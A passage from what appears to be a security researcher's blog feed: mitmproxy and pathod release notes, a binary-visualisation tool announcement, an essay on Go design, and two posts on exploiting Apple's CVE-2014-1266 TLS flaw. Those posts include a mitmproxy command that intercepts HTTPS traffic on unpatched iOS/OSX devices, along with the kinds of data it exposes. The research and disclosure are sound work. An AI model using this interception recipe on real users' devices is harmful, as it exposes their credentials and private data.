Code<\/a>\nprogram, and will be adding HTTP2 support - one of our most anticipated\nfeatures. Special thanks goes to the <a rel=\"external\" href=\"https:\/\/www.honeynet.org\/\">Honeynet\nProject<\/a> under whose aegis the GSoC work will be\ndone.<\/p>\n<p>Lastly, a peek into the project's immediate future. We have websockets support\non the way, thanks to a protocol contribution by <a rel=\"external\" href=\"https:\/\/github.com\/Chandler\">Chandler\nAbraham<\/a>. We have HTTP2 on the way, thanks to\nThomas. The mitmproxy web interface is gradually maturing behind the scenes,\nand should be ready to be unleashed on the world soon. And, of course, the\nproject continues to improve quickly in almost every other respect. It's an\nexciting time, and there's a lot of interesting work to do - if you'd like to\nbe involved, please get in touch.<\/p>\n<h2 id=\"mitmproxy-v0-12\">mitmproxy v0.12<\/h2>\n<div class=\"media\">\n    <a href=\"..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png\">\n        <img src=\"..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>The most immediately visible change in v0.12 is a thorough overhaul of the\nconsole interface, which has been improved in almost every respect. Performance\nand responsiveness is better, keybindings have been consolidated, and options\nhave been collected in a dedicated options screen (shortcut \"o\"). Palettes have\nbeen overhauled entirely, with improvements to the palettes themselves, the\nability to change palettes on the fly, and support for non-transparent\n(mitmproxy sets the console background) and transparent (your emulator sets the\nconsole background) modes. The console application has also sprouted a powerful\nnew cookie editor that will make tampering with cookie names and values more\nconvenient.<\/p>\n<p>Other major features include official support for transparent mode on FreeBSD\n(thanks to <a rel=\"external\" href=\"http:\/\/github.com\/mike-pt\">Mike C<\/a>), the ability to log TLS master\nkeys for use with other tools like WireShark, support for creating flows from\nscratch in the console app (thanks <a rel=\"external\" href=\"https:\/\/github.com\/gato\">Marcelo Glezer<\/a>).\nA thorough overhaul of the documentation is also under way - thanks to <a rel=\"external\" href=\"https:\/\/github.com\/elitest\">Jim\nShaver<\/a> for his work there.<\/p>\n<h2 id=\"pathod-v0-12\">pathod v0.12<\/h2>\n<p>I'm also releasing pathod v0.12. The primary change here is the first phase of\nfull support for websockets. At the moment, this is client-only - server\nsupport will follow in the next release.<\/p>\n<p>Here's a taster - the pathoc command below initiates a websocket connection to\necho.websockets.org, then sends 10 websocket frames, each with a body of 100\nrandom bytes.<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;<\/span><span> .\/pathoc echo.websockets.org ws:\/ wf:b@100:x10<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;<\/span><span> ws:\/<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">&lt;&lt;<\/span><span style=\"color: #032F62;\"> 200<\/span><span style=\"color: #6F42C1;\"> OK:<\/span><span style=\"color: #005CC5;\"> 225<\/span><span style=\"color: #032F62;\"> bytes<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #032F62;\">&gt;&gt; wf:b@100:ir,@1<\/span><\/span><\/code><\/pre>\n<p>The usual range of injections and stream manipulations are available, and every\naspect of the websocket frames can be manipulated in ways that creatively\nviolate the specs. See the pathod documentation for the language definition.<\/p>\n"},{"title":"binvis.io - a browser-based tool for visualising binary data","published":"2015-03-04T00:00:00+00:00","updated":"2015-03-04T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/binvis\/announce\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/binvis\/announce\/","content":"<p>Over the years, I've written a number of posts on this blog on the topic of\nbinary data visualisation. I looked at <a href=\"https:\/\/corte.si\/posts\/visualisation\/binvis\/\">using space-filling curves to understand\nthe structure of binary data<\/a>, I've\nshowed how <a href=\"https:\/\/corte.si\/posts\/visualisation\/entropy\/\">entropy visualisation lets you trivially pick out compressed and\nencrypted sections<\/a>, and I've drawn\n<a href=\"https:\/\/corte.si\/posts\/visualisation\/malware\/\">pretty pictures of malware<\/a>.\nUnfortunately the tools I wrote (<a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/scurve\">code here<\/a>)\nall produced static images, which made making practical use a pain. You really\nneed interactivity to be able to combine visual exploration with inspection of\nthe actual underlying data, and to let you easily export interesting sections.<\/p>\n<h2 id=\"binvis-io\"><a rel=\"external\" href=\"http:\/\/binvis.io\">binvis.io<\/a><\/h2>\n<p>l recently started toying with the idea of using web technologies to build an\ninteractive visualiser of this sort. One thing led to another... and today, I'm\nhappy to announce a first draft of the idea: binvis.io<\/p>\n<div class=\"media\">\n    <a href=\"http:&#x2F;&#x2F;binvis.io&#x2F;#&#x2F;view&#x2F;examples&#x2F;elf-Linux-ARMv7-ls.bin?colors=entropy\">\n        <img src=\"binvis.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>With binvis.io you can:<\/p>\n<ul>\n<li>Visually explore binary data<\/li>\n<li>Cluster bytes to pick out fine structural features with space-filling\ncurves<\/li>\n<li>Use the simple scan layout to navigate and select data intuitively<\/li>\n<li>Flip between a number of useful byte color mappings, including an entropy\nvisualiser that lets you pick out compressed or encrypted sections<\/li>\n<li>Export data segments for analysis<\/li>\n<\/ul>\n<h2 id=\"next-steps\">Next steps<\/h2>\n<p>Right now, Binvis is local only - that is, when you open a file, all analysis is\ndone in your browser and nothing is sent to the server. In the longer term, I'd\nlike to add the ability to upload, share and annotate binaries, both publicly\nand privately. There is probably a market of... oh, at least a dozen people out\nthere who would have use for an imgur-like sharing system for binaries. Fame and\nriches surely await. Of course, there are also an immense number of other\nimprovements to be made to almost every aspect of binvis, ranging from speed, to\nbetter colour schemes, to improvements in interaction and UX.<\/p>\n<p>The todo list is long, and time is short, so I'm looking for serious\ncollaborators. If you're interested, drop me a line!<\/p>\n<h2 id=\"thanks\">Thanks<\/h2>\n<p>Binvis isn't the first interactive binary visualisation tool of this sort. A few\nothers that spring to mind are\n<a rel=\"external\" href=\"https:\/\/sites.google.com\/site\/xxcantorxdustxx\/about\">..cantor.dust<\/a>,\n<a rel=\"external\" href=\"https:\/\/github.com\/joesavage\/binspect\">bininspect<\/a> and\n<a rel=\"external\" href=\"https:\/\/github.com\/wapiflapi\/binglide\">binglide<\/a>. I'm trying to learn from\nthese precursors, and I'm delighted to see that they all also drew, to a greater\nor lesser extent, on my earlier work. Thus the eternal cycle of code rolls on.<\/p>\n<p>I'd like to particularly thank <a rel=\"external\" href=\"http:\/\/www.rumint.org\/gregconti\/\">Greg Conti<\/a>\nfor letting me re-use the name of <a rel=\"external\" href=\"https:\/\/code.google.com\/p\/binvis\/\">his own, much earlier visualisation\ntool<\/a>, for publishing a fascinating series of\n<a rel=\"external\" href=\"http:\/\/www.rumint.org\/gregconti\/publications\/taxonomy-bh.pdf\">papers<\/a> and\n<a rel=\"external\" href=\"https:\/\/vimeo.com\/15633207\">talks<\/a> on the topic, and for providing feedback\nboth on this particular incarnation of the idea as well as my earlier dabblings.<\/p>\n"},{"title":"mitmproxy 0.11.2","published":"2014-12-29T00:00:00+00:00","updated":"2014-12-29T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_11_2\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_11_2\/","content":"<div class=\"media\">\n    <a href=\"..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png\">\n        <img src=\"..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I've just pushed <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy v0.11.2<\/a> out the door. This is\nprimarily a bugfix release, but does have one very useful new feature:\nconfiguration files. All options available through command-line flags can now be\nset persistently in config files, for all the tools - <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/config.html\">see the documentation for\nmore<\/a>. Adding this was made much easier by\n<a rel=\"external\" href=\"https:\/\/github.com\/zorro3\/ConfigArgParse\">ConfigArgParse<\/a>, one of those small\nPython project gems that you feel more people should know about. Check it out.<\/p>\n<p>This release also features the usual array of bugfixes and small improvements.\nIn particular, we know handle upstream servers that knock back connections\nwithout SNI better, and the onboarding app now works in the OSX binary builds.\nEveryone should update.<\/p>\n"},{"title":"mitmproxy and pathod 0.11","published":"2014-11-07T00:00:00+00:00","updated":"2014-11-07T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_11\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_11\/","content":"<div class=\"media\">\n    <a href=\"..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png\">\n        <img src=\"..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I'm happy to announce that we've just released v0.11 of both\n<a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a> and <a rel=\"external\" href=\"http:\/\/pathod.net\">pathod<\/a>. This release\nfeatures a huge revamp of mitmproxy's internals and a long list of important\nfeatures. Pathod has much improved SSL support and fuzzing.<\/p>\n<p>Our thanks to the many testers and [contributors](https:\n\/\/github.com\/mitmproxy\/mitmproxy\/blob\/master\/CONTRIBUTORS) that helped get this\nout the door. Please lodge bug reports and feature requests\n<a rel=\"external\" href=\"https:\/\/github.com\/mitmproxy\/mitmproxy\/issues\">here<\/a>.<\/p>\n<h2 id=\"mitmproxy-changelog\">Mitmproxy Changelog<\/h2>\n<ul>\n<li>Performance improvements for mitmproxy console<\/li>\n<li>SOCKS5 proxy mode allows mitmproxy to act as a SOCKS5 proxy server<\/li>\n<li>Data streaming for response bodies exceeding a threshold\n(bradpeabody@gmail.com)<\/li>\n<li>Ignore hosts or IP addresses, forwarding both HTTP and HTTPS traffic\nuntouched<\/li>\n<li>Finer-grained control of traffic replay, including options to ignore\ncontents or parameters when matching flows (marcelo.glezer@gmail.com)<\/li>\n<li>Pass arguments to inline scripts<\/li>\n<li>Configurable size limit on HTTP request and response bodies<\/li>\n<li>Per-domain specification of interception certificates and keys (see\n--cert option)<\/li>\n<li>Certificate forwarding, relaying upstream SSL certificates verbatim (see\n--cert-forward)<\/li>\n<li>Search and highlighting for HTTP request and response bodies in\nmitmproxy console (pedro@worcel.com)<\/li>\n<li>Transparent proxy support on Windows<\/li>\n<li>Improved error messages and logging<\/li>\n<li>Support for FreeBSD in transparent mode, using pf (zbrdge@gmail.com)<\/li>\n<li>Content view mode for WBXML (davidshaw835@air-watch.com)<\/li>\n<li>Better documentation, with a new section on proxy modes<\/li>\n<li>Generic TCP proxy mode<\/li>\n<li>Countless bugfixes and other small improvements<\/li>\n<\/ul>\n<h2 id=\"pathod-changelog\">Pathod Changelog<\/h2>\n<ul>\n<li>Hugely improved SSL support, including dynamic generation of certificates\nusing the mitproxy cacert<\/li>\n<li>pathoc -S dumps information on the remote SSL certificate chain<\/li>\n<li>Big improvements to fuzzing, including random spec selection and memoization\nto avoid repeating randomly generated patterns<\/li>\n<li>Reflected patterns, allowing you to embed a pathod server response\nspecification in a pathoc request, resolving both on client side. This makes\nfuzzing proxies and other intermediate systems much better.<\/li>\n<\/ul>\n"},{"title":"mitmproxy now supports #gotofail","published":"2014-03-11T00:00:00+00:00","updated":"2014-03-11T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/gotofail-mitmproxy\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/gotofail-mitmproxy\/","content":"<p>A few weeks ago, I posted that I had hacked up <a href=\"https:\/\/corte.si\/posts\/security\/cve-2014-1266\/\">a version of mitmproxy that\nexploited CVE-2014-1266<\/a>, giving unrestricted\naccess to nearly all HTTPS traffic on affected IOS and OSX devices. I chose not\nto release working code at the time, but a number of\n<a rel=\"external\" href=\"https:\/\/github.com\/gabrielg\/CVE-2014-1266-poc\">POCs<\/a> have been floating about\npublicly almost since the issue was first discovered. So, the time has come to\npublish - as of yesterday, <a rel=\"external\" href=\"https:\/\/github.com\/mitmproxy\/mitmproxy\">mitmproxy's master\nbranch<\/a> supports #gotofail.<\/p>\n<p>To see the exploit in action, invoke mitmproxy as follows:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">mitmproxy<\/span><span style=\"color: #005CC5;\"> --ciphers=<\/span><span style=\"color: #032F62;\">&quot;DHE-RSA-AES256-SHA&quot;<\/span><span style=\"color: #005CC5;\"> --cert-forward<\/span><\/span><\/code><\/pre>\n<p>After configuring your device proxy, you should see something like this\nscreenshot, which shows off interception of miscellaneous iTunes traffic:<\/p>\n<div class=\"media\">\n    <a href=\".&#x2F;gotofail-mitmproxy.png\">\n        <img src=\".&#x2F;gotofail-mitmproxy.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Note that the client device here has no mitmproxy CA certificate installed, and\nwe get circumvention of certificate pinning \"for free\".<\/p>\n<p>Two new options make the magic work. The <strong>--ciphers<\/strong> option specifies which\nSSL ciphers we should expose to connecting clients. In this case, we force the\nclient to use a DHE cipher, which is required to trigger the issue. The\n<strong>--cert-forward<\/strong> option tells mitmproxy to pass upstream SSL certificates\ndown to the client unmodified. Usually we'd expect this to fail, since the\nupstream certs won't match mitmproxy's private key. In this case #gotofail\nmeans the client fails to properly execute the check, letting us pass\ncertificates through to the client verbatim as if we owned them.<\/p>\n<p>There's one additional wrinkle that mitmproxy smooths over - before we can get\nthe mismatching certificate and key to the client, OpenSSL itself has to be\ncoaxed into accepting them. The first version of my exploit involved a patch\nto OpenSSL to remove the library's own consistency check, but this is\ninconvenient. Luckily it turns out that we can <a rel=\"external\" href=\"https:\/\/github.com\/mitmproxy\/netlib\/blob\/master\/netlib\/certffi.py\">munge an obscure\nflag<\/a> in the\nRSA data-structures to circumvent this, which allows us to exploit #gotofail in\npure Python.<\/p>\n<p>The moment I got this exploit working, I marched upstairs and confiscated my\nwife's un-updated iPhone 5 to add it to my pool of test devices (never fear -\nit's been replaced with a nice new 5S). Devices running IOS of the right\nvintage have suddenly become the gold standard for analysis and pen testing.\nThis beautiful vulnerability lets us circumvent SSL effortlessly, completely\nsidestepping certificate pinning for all the applications I've tried, without\nany <a rel=\"external\" href=\"https:\/\/github.com\/iSECPartners\/ios-ssl-kill-switch\">cumbersome and invasive interference with the\ndevice<\/a>. Combine this with\nthe fact that these same devices also have an un-tethered jailbreak, and I think\nit's unlikely that we'll ever have an analysis platform this nice again. So,\nstockpile your IOS 7.0.6 devices now, and intercept all the things.<\/p>\n"},{"title":"Exploiting CVE-2014-1266 with mitmproxy","published":"2014-02-25T00:00:00+00:00","updated":"2014-02-25T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/cve-2014-1266\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/cve-2014-1266\/","content":"<p>This post is a quick recap of work I've been discussing on Twitter in the last\nfew hours. I've just finished putting together a version of\n<a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a> that takes advantage of\n<a rel=\"external\" href=\"http:\/\/support.apple.com\/kb\/HT6147\">CVE-2014-1266<\/a>, Apple's <a rel=\"external\" href=\"https:\/\/www.imperialviolet.org\/2014\/02\/22\/applebug.html\">critical SSL\/TLS\nbug<\/a>. We knew in theory\nthat the issue should give access to all SSL traffic using Apple's broken\nimplementation - I can now report that this is also true in practice.<\/p>\n<p>I've confirmed full transparent interception of HTTPS traffic on both IOS (prior\nto 7.0.6) and OSX Mavericks. Nearly all encrypted traffic, including usernames,\npasswords, and even Apple app updates can be captured.  This includes:<\/p>\n<ul>\n<li>App store and software update traffic<\/li>\n<li>iCloud data, including KeyChain enrollment and updates<\/li>\n<li>Data from the Calendar and Reminders<\/li>\n<li>Find My Mac updates<\/li>\n<li>Traffic for applications that use certificate pinning, like Twitter<\/li>\n<\/ul>\n<p>It's difficult to over-state the seriousness of this issue. With a tool like\nmitmproxy in the right position, an attacker can intercept, view and modify\nnearly all sensitive traffic. This extends to the software update mechanism\nitself, which uses HTTPS for deployment.<\/p>\n<p>At the time of writing, Apple still doesn't have a fix deployed for OSX. It took\nless than a day to get the patched version of mitmproxy and its supporting\nlibraries up and running. I won't be releasing my patches until well after\nApple's pending update, but it's safe to assume that this is now being exploited\nin the wild. Of course, intelligence agencies have no doubt been on top of this\nfor some time - perhaps some of the <a rel=\"external\" href=\"http:\/\/news.yahoo.com\/security-expert-calls-nbc-whiny-report-sochi-olympics-003047841.html\">inflammatory Sochi security horror\nstories<\/a>\nwere plausible after all.<\/p>\n"},{"title":"mitmproxy and pathod 0.10","published":"2014-01-29T00:00:00+00:00","updated":"2014-01-29T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_10\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_10\/","content":"<div class=\"media\">\n    <a href=\"..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png\">\n        <img src=\"..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I've just released v0.10 of both <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a> and\n<a rel=\"external\" href=\"http:\/\/pathod.org\">pathod<\/a>. This is chiefly a bugfix release, with a few nice\nadditional features to sweeten the pot.<\/p>\n<div class=\"media\">\n    <a href=\"mitmproxy-webapp.png\">\n        <img src=\"mitmproxy-webapp.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Perhaps the most visible change has been a huge improvement in the recommended\nmethod for installing the mitmproxy certificates. Certs are now served straight\nfrom the web application hosted in mitmproxy, which means that in most cases\ncert installation is as simple as typing the mitmproxy URL into the devce\ndriver. <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/certinstall\/webapp.html\">See the docs<\/a> for\nmore.<\/p>\n<p>In other, minor news - I see that the <a rel=\"external\" href=\"https:\/\/github.com\/mitmproxy\/mitmproxy\">mitmproxy\nproject<\/a> has just passed 2000 stars on\nGitHub. Between PyPi and the files we serve from\n<a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy.org<\/a>, the project has also seen nearly 100k\ndownloads in the last year (after removing obvious bots). I know, I know -\nfigures like these don't mean much, but it's still nice to see that people are\nusing and enjoying mitmproxy.<\/p>\n<h2 id=\"changelog\">Changelog<\/h2>\n<ul>\n<li>Support for multiple scripts and multiple script arguments<\/li>\n<li>Easy certificate install through the in-proxy web app, which is now\nenabled by default<\/li>\n<li><a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/features\/forwardproxy.html\">Forward proxy mode<\/a>,\nthat forwards proxy requests to an upstream HTTP server<\/li>\n<li>Reverse proxy now works with SSL<\/li>\n<li>Search within a request\/response using the \"\/\" and \"n\" shortcut keys<\/li>\n<li>A view that beatifies CSS files if cssutils is available<\/li>\n<li>Many bug fix, documentation improvements, and more.<\/li>\n<\/ul>\n"},{"title":"How I Learned to Stop Worrying and Love Golang","published":"2013-11-21T00:00:00+00:00","updated":"2013-11-21T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/go\/golang-practicaly-beats-purity\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/go\/golang-practicaly-beats-purity\/","content":"<p>Here's a riff on Malcolm Gladwell's <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Outliers_(book)\">rule of thumb about\nmastery<\/a>: you don't really know\na programming language until you've written 10,000 lines of production-quality\ncode in it. Like the original this is a generalization that is undoubtedly false\nin many cases - still, it broadly matches my intuition for most languages and\nmost programmers<sup class=\"footnote-reference\"><a href=\"#3\">1<\/a><\/sup>. At the beginning of this year, I wrote <a href=\"https:\/\/corte.si\/posts\/code\/go\/go-rant\/\">a sniffy post\nabout Go<\/a> when I was about 20% of the way to knowing\nthe language by this measure. Today's post is an update from further along the\ncurve - about 80% - following a recent set of adventures that included entirely\nrewriting <a rel=\"external\" href=\"http:\/\/choir.io\">choir.io<\/a>'s core dispatcher in Go. My opinion of Go\nhas changed significantly in the meantime.  Despite my initial exasperation, I\nfound that the experience of actually writing Go was not unpleasant. The shallow\nissues became less annoying over time (perhaps just due to habituation), and the\ndeep issues turned out to be less problematic in practice than in theory. Most\nof all, though, I found Go was just a fun and productive language to work in. Go\nhas colonized more and more use cases for me, to the point where it is now\nseriously eroding my use of both Python and C.<\/p>\n<p>After my rather slow Road to Damascus experience, I noticed something odd: I\nfound it difficult to explain why Go worked so well in practice. Sure, Go has a\ntriad of really smashing ideas (interfaces, channels and goroutines), but my\nlist of warts and annoyances is long enough that it's not clear on paper that\nthe upsides outweigh the downsides. So, my experience of actually cutting code\nin Go was at odds with my rational analysis of the language, which bugged me.\nI've thought about this a lot over the last few months, and eventually came up\nwith an explanation that sounds like nonsense at first sight: Go's weaknesses\nare also its strengths. In particular, many design choices that seem to reduce\ncoherence and maintainability at first sight actually combine to give the\nlanguage a practical character that's very usable and compelling. Lets see if I\ncan convince you that this isn't as crazy as it sounds.<\/p>\n<h2 id=\"maps-and-magic\">Maps and magic<\/h2>\n<p>Lets pretend that we're the designers of Go, and see if we can follow the\nthinking that went into a seemingly simple part of the language - the value\nretrieval syntax for maps. We begin with the simplest possible case - direct,\nobvious, and familiar from a number of other languages:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span>v<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> mymap[<\/span><span style=\"color: #032F62;\">&quot;foo&quot;<\/span><span>]<\/span><\/span><\/code><\/pre>\n<p>It would be nice if we could keep it this simple, but there's a complication -\nwhat if \"foo\" doesn't exist in the map? The fact that Go doesn't have\nexceptions limits the possibilities. We can discard some gross options out of\nhand - for instance, making this a runtime error or returning a magic value\nflagging non-existence are both pretty horrible. A more plausible route is to\npass an existence flag back as a second return value:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span>v, ok<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> mymap[<\/span><span style=\"color: #032F62;\">&quot;foo&quot;<\/span><span>]<\/span><\/span><\/code><\/pre>\n<p>So far, so logical, and if consistency was the primary goal, we would stop here.\nHowever, having two return arguments would make many common patterns of use\ninconvenient. You would constantly be discarding the <strong>ok<\/strong> flag in situations\nwhere it wasn't needed. Another repercussion is that you couldn't directly use\nthe results in an <strong>if<\/strong> clause. Instead of a clean phrasing like this (relying\non the zero value returned by default):<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">if map<\/span><span>[<\/span><span style=\"color: #032F62;\">&quot;foo&quot;<\/span><span>] {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    \/\/ Do something<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span><\/code><\/pre>\n<p>... you would have to do this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">if<\/span><span> _, ok<\/span><span style=\"color: #D73A49;\"> := map<\/span><span>[<\/span><span style=\"color: #032F62;\">&quot;foo&quot;<\/span><span>]; ok {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    \/\/ Do something<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span><\/code><\/pre>\n<p>Ugh. What we really want, is to get the best of both worlds. The ease of the\nfirst signature, plus the flexibility of the second. In fact, Go does exactly\nthat, in a surprising way: it discards some basic conceptual constraints, and\nmakes the data returned by the map accessor depend on how many variables it's\nassigned to. When it's assigned to one variable, it just returns the value.\nWhen it's assigned to two variables, it also returns an existence flag.<\/p>\n<p>Compare this with Python. The dictionary access syntax is identical:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span>v<\/span><span style=\"color: #D73A49;\"> =<\/span><span> mymap[<\/span><span style=\"color: #032F62;\">&quot;foo&quot;<\/span><span>]<\/span><\/span><\/code><\/pre>\n<p>Python does have exceptions, so non-existence is signaled through a\n<strong>KeyError<\/strong>, and the dictionary interface includes a <strong>get<\/strong> method that\nallows the user to specify a default return when this is too cumbersome. This\nis certainly consistent on the surface, but there's also a deeper structure\nthat helps the user understand what's going on. The square bracket accessor\nsyntax is just syntactic sugar, because the call above is equivalent to this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span>v<\/span><span style=\"color: #D73A49;\"> =<\/span><span> mymap.<\/span><span style=\"color: #005CC5;\">__getitem__<\/span><span>(<\/span><span style=\"color: #032F62;\">&quot;foo&quot;<\/span><span>)<\/span><\/span><\/code><\/pre>\n<p>In a sense, then, the value access is just a method call. The coder can write a\ndictionary of their own that acts just like a built-in dictionary<sup class=\"footnote-reference\"><a href=\"#2\">2<\/a><\/sup>, and can\nalso build a clear mental model of what's going on underneath. Python\ndictionaries are conceptually built <em>up<\/em> from more primitive language elements,\nwhere Go maps are designed <em>down<\/em> from concrete use cases.<\/p>\n<h2 id=\"range-a-compendium-of-use-cases\">Range: a compendium of use cases<\/h2>\n<p>An even stranger beast is the <strong>range<\/strong> clause of Go's for loops. Like map\naccessors, <strong>range<\/strong> will return either one value or two, depending on the\nnumber of variables assigned to. What's particularly revealing about <strong>range<\/strong>\nis the way these results differ depending on the data type being ranged over.\nConsider this piece of code, for example:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">for<\/span><span> x, y<\/span><span style=\"color: #D73A49;\"> := range<\/span><span> v {<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span><\/code><\/pre>\n<p>To figure out what this does, we need to know the type of <strong>v<\/strong>, and then\nconsult a table like this:<sup class=\"footnote-reference\"><a href=\"#1\">3<\/a><\/sup><\/p>\n<table class=\"table table-bordered\">\n    <tr>\n        <th>Range expression<\/th>\n        <th>1st Value<\/th>\n        <th>2nd Value<\/th>\n    <\/tr>\n    <tr>\n        <td>array or slice<\/td>\n        <td>index i<\/td>\n        <td>a[i]<\/td>\n    <\/tr>\n    <tr>\n        <td>map<\/td>\n        <td>key k<\/td>\n        <td>m[k]<\/td>\n    <\/tr>\n    <tr>\n        <td>string<\/td>\n        <td>index i of rune<\/td>\n        <td>rune int<\/td>\n    <\/tr>\n    <tr>\n        <td>channel<\/td>\n        <td>element<\/td>\n        <td>error<\/td>\n    <\/tr>\n<\/table>\n<p>What range does for arrays and maps seems consistent and not particularly\nsurprising. Things get a tad slightly odd with channels. A second variable\narguably doesn't make much sense when ranging over a channel, so trying to do\nthis results in a compile time error. Not terribly consistent, but logical.<\/p>\n<p>Weirder still is <strong>range<\/strong> over strings. When operating on a string, range\nreturns <a rel=\"external\" href=\"http:\/\/golang.org\/ref\/spec#Constants\">runes<\/a> (Unicode code points) not\nbytes.  So, this code:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span>s<\/span><span style=\"color: #D73A49;\"> :=<\/span><span style=\"color: #032F62;\"> &quot;a<\/span><span style=\"color: #005CC5;\">\\u00fc<\/span><span style=\"color: #032F62;\">b&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">for<\/span><span> a, b<\/span><span style=\"color: #D73A49;\"> := range<\/span><span> s {<\/span><\/span>\n<span class=\"giallo-l\"><span>    fmt.<\/span><span style=\"color: #6F42C1;\">Println<\/span><span>(a, b)<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span><\/code><\/pre>\n<p>Prints this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>0 97<\/span><\/span>\n<span class=\"giallo-l\"><span>1 252<\/span><\/span>\n<span class=\"giallo-l\"><span>3 98<\/span><\/span><\/code><\/pre>\n<p>Notice the jump from 1 to 3 in the array index, because the rune at offset 1 is\ntwo bites wide in UTF-8. And look what happens when we now retrieve the value\nat that offset from the array. This:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span>fmt.<\/span><span style=\"color: #6F42C1;\">Println<\/span><span>(s[<\/span><span style=\"color: #005CC5;\">1<\/span><span>])<\/span><\/span><\/code><\/pre>\n<p>Prints this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>195<\/span><\/span><\/code><\/pre>\n<p>What gives? At first glance, it's reasonable to expect this to print 252, as\nreturned by <strong>range<\/strong>. That's wrong, though, because string access by index\noperates on bytes, so what we're given is the first byte of the UTF-8 encoding\nof the rune. This is bound to cause subtle bugs. Code that works perfectly on\nASCII text simply due to the fact that UTF-8 encodes these in a single byte\nwill fail mysteriously as soon as non-ASCII characters appear.<\/p>\n<p>My argument here is that <strong>range<\/strong> is a very clear example of design directly\nfrom concrete use cases down, with little concern for consistency. In fact, the\ntable of <strong>range<\/strong> return values above is really just a compendium of use\ncases: at each point the result is 